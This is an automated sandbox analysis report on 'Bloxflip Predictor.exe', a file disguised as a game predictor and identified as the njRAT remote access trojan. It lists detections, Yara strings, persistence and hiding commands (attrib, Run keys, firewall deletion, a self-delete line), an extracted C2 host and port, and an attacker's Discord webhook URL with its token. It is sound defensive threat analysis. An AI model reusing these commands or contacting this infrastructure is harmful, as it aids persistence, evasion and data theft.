Windows Analysis Report
Bloxflip Predictor.exe

Overview

General Information

Sample name: Bloxflip Predictor.exe
Analysis ID: 1574576
MD5: 7bf897ca59b77ad3069c07149c35f97e
SHA1: 6951dc20fa1e550ec9d066fe20e5100a9946a56b
SHA256: bc37b896fee26a5b4de7845cdd046e0200c783d4907ffa7e16da84ed6b5987dd
Tags: exe, NjRAT, user-lontze7

Detection

Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Disables zone checking for all users
Drops PE files to the startup folder
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • Bloxflip Predictor.exe (PID: 5504 cmdline: "C:\Users\user\Desktop\Bloxflip Predictor.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
    • Bloxflip Predictor.exe (PID: 428 cmdline: "C:\Windows\Bloxflip Predictor.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
      • attrib.exe (PID: 2876 cmdline: attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
        • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 1476 cmdline: attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
        • conhost.exe (PID: 4796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5336 cmdline: attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Bloxflip Predictor.exe (PID: 7056 cmdline: "C:\Windows\Bloxflip Predictor.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
  • Windows.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe" MD5: 7BF897CA59B77AD3069C07149C35F97E)
  • cleanup
Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Host": "quite-cs.at.ply.gg", "Port": "10397", "Registry Value": "Windows", "Auto Run": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HaCkEd", "Network Seprator": "|-F-|", "Install Dir": "WinDir", "Install Name": "Bloxflip Predictor.exe", "Version": "v2.0"}
Source | Rule | Description | Author | Strings
Bloxflip Predictor.exe | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
Bloxflip Predictor.exe | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x4c2e:$a1: get_Registry
  • 0x5b6d:$a2: SEE_MASK_NOZONECHECKS
  • 0x5d48:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x5ce8:$a5: netsh firewall delete allowedprogram "
  • 0x5c66:$a6: [+] System :
Bloxflip Predictor.exe | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0x5d48:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x5987:$s3: Executed As
  • 0x4305:$s5: Stub.exe
Bloxflip Predictor.exe | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x5b6d:$reg: SEE_MASK_NOZONECHECKS
  • 0x595f:$msg: Execute ERROR
  • 0x59a1:$msg: Execute ERROR
  • 0x5d48:$ping: cmd.exe /c ping 0 -n 2 & del
Bloxflip Predictor.exe | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x5602:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x4c2e:$a1: get_Registry
  • 0x5b6d:$a2: SEE_MASK_NOZONECHECKS
  • 0x5d48:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x5ce8:$a5: netsh firewall delete allowedprogram "
  • 0x5c66:$a6: [+] System :
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0x5d48:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x5987:$s3: Executed As
  • 0x4305:$s5: Stub.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x5b6d:$reg: SEE_MASK_NOZONECHECKS
  • 0x595f:$msg: Execute ERROR
  • 0x59a1:$msg: Execute ERROR
  • 0x5d48:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x5602:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source | Rule | Description | Author | Strings
0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x1f54:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x4a2e:$a1: get_Registry
  • 0x596d:$a2: SEE_MASK_NOZONECHECKS
  • 0x5b48:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x5ae8:$a5: netsh firewall delete allowedprogram "
  • 0x5a66:$a6: [+] System :
00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x596d:$reg: SEE_MASK_NOZONECHECKS
  • 0x575f:$msg: Execute ERROR
  • 0x57a1:$msg: Execute ERROR
  • 0x5b48:$ping: cmd.exe /c ping 0 -n 2 & del
00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x5402:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source | Rule | Description | Author | Strings
1.0.Bloxflip Predictor.exe.510000.0.unpack | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
1.0.Bloxflip Predictor.exe.510000.0.unpack | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x4c2e:$a1: get_Registry
  • 0x5b6d:$a2: SEE_MASK_NOZONECHECKS
  • 0x5d48:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x5ce8:$a5: netsh firewall delete allowedprogram "
  • 0x5c66:$a6: [+] System :
1.0.Bloxflip Predictor.exe.510000.0.unpack | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0x5d48:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x5987:$s3: Executed As
  • 0x4305:$s5: Stub.exe
1.0.Bloxflip Predictor.exe.510000.0.unpack | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x5b6d:$reg: SEE_MASK_NOZONECHECKS
  • 0x595f:$msg: Execute ERROR
  • 0x59a1:$msg: Execute ERROR
  • 0x5d48:$ping: cmd.exe /c ping 0 -n 2 & del
1.0.Bloxflip Predictor.exe.510000.0.unpack | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x5602:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM

          System Summary

          Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\Bloxflip Predictor.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Bloxflip Predictor.exe, ProcessId: 5504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2
          Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\Bloxflip Predictor.exe, ProcessId: 5504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
          Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL, EventID: 13, EventType: SetValue, Image: C:\Windows\Bloxflip Predictor.exe, ProcessId: 428, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2

          AV Detection

          Source: Bloxflip Predictor.exe | Avira: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | Avira: detection malicious, Label: TR/Dropper.Gen7
          Source: C:\Windows\Bloxflip Predictor.exe | Avira: detection malicious, Label: TR/Dropper.Gen7
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack | Malware Configuration Extractor: Njrat {"Host": "quite-cs.at.ply.gg", "Port": "10397", "Registry Value": "Windows", "Auto Run": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HaCkEd", "Network Seprator": "|-F-|", "Install Dir": "WinDir", "Install Name": "Bloxflip Predictor.exe", "Version": "v2.0"}
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | ReversingLabs: Detection: 84%
          Source: C:\Windows\Bloxflip Predictor.exe | ReversingLabs: Detection: 84%
          Source: Bloxflip Predictor.exe | ReversingLabs: Detection: 84%
          Source: Yara match | File source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara match | File source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara match | File source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | Joe Sandbox ML: detected
          Source: C:\Windows\Bloxflip Predictor.exe | Joe Sandbox ML: detected
          Source: Bloxflip Predictor.exe | Joe Sandbox ML: detected
          Source: Bloxflip Predictor.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.5:49714 version: TLS 1.0
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Bloxflip Predictor.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe | File opened: C:\Users\user
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe | File opened: C:\Users\user\AppData

          Networking

          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49777 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49830 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49887 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49887 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49887 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49941 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49941 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49941 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49981 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49981 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49981 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49982 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49982 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49983 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49983 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49983 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49982 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49984 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49984 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49985 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49985 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49985 -> 147.185.221.224:10397
          Source: Network traffic | Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49984 -> 147.185.221.224:10397
          Source: global traffic | TCP traffic: 147.185.221.224 ports 0,1,3,7,9,10397
          Source: global traffic | TCP traffic: 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: global traffic | HTTP traffic detected: POST /api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: discord.com | Content-Length: 247 | Expect: 100-continue | Connection: Keep-Alive
          Source: Joe Sandbox View | IP Address: 162.159.137.232
          Source: Joe Sandbox View | ASN Name: SALSGIVERUS
          Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.5:49714 version: TLS 1.0
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: discord.com
          Source: global trafficDNS traffic detected: DNS query: quite-cs.at.ply.gg
          Source: unknownHTTP traffic detected: POST /api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 247Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 11:31:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734089514x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9wbsGCU7WkE%2FAtznTqtdQcBmchAp1Y%2Ftal2agipQu6gJShuOgAt6wF1BFedC2mkbQka87vBjO1C3QQhfV%2Bt1BsgOmy2xAsUYAOt%2BfBksRAohlWjfA40K6ZBFZmr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=d3f28fe7b7367f135ebf22d2ac86ded1e15eb002-1734089513; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=pnFd6BJ.ITU12cb7tlltd2RqJsrP8UVkk0QdnIVrVG4-1734089513550-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f15a160bce84387-EWR{"message": "Unknown Webhook", "code": 10015}
          Source: Bloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.drString found in binary or memory: https://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZ
          Source: Bloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.drString found in binary or memory: https://gg.ylp.ta.sc-etiuq
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714

          E-Banking Fraud

          Source: Yara matchFile source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara matchFile source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED

          System Summary

          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
